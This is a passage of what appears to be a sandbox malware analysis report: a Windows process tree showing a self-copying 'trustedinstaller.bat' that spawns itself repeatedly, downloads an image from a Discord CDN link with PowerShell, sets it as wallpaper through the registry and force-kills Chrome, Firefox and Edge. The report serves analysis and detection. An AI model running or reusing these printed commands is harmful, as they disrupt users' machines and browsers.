        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:6668
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8164
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:6684
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:6804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:6852
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8020
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:3876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4892
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1944
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5664
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3280
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3168
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5476
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3368
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2052
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:1204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:764
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:8772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:8832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9212
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:6964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:4204
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:2020
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:4272
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:2204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2176
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2652
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2584
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6344
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6944
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:3380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:6736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:8504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:8512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:8528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:8752
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:8760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:2224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4040
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2232
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5740
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:5316
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:2792
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:4756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:5652
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6428
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:6112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:6000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:3912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:5260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1820
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3996
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3600
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6016
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6236
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:9448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9544
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:9576
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:9632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1596
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3484
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6920
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:3524
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:3912
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2932
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2380
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3088
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3236
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2372
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1524
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:3492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:3000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:3576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:6292
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:744
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7760
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:4164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:3420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:4504
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:4488
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:6788
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:3360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1352
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:9496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9528
    - - C:\Windows\system32\cmd.exe
        
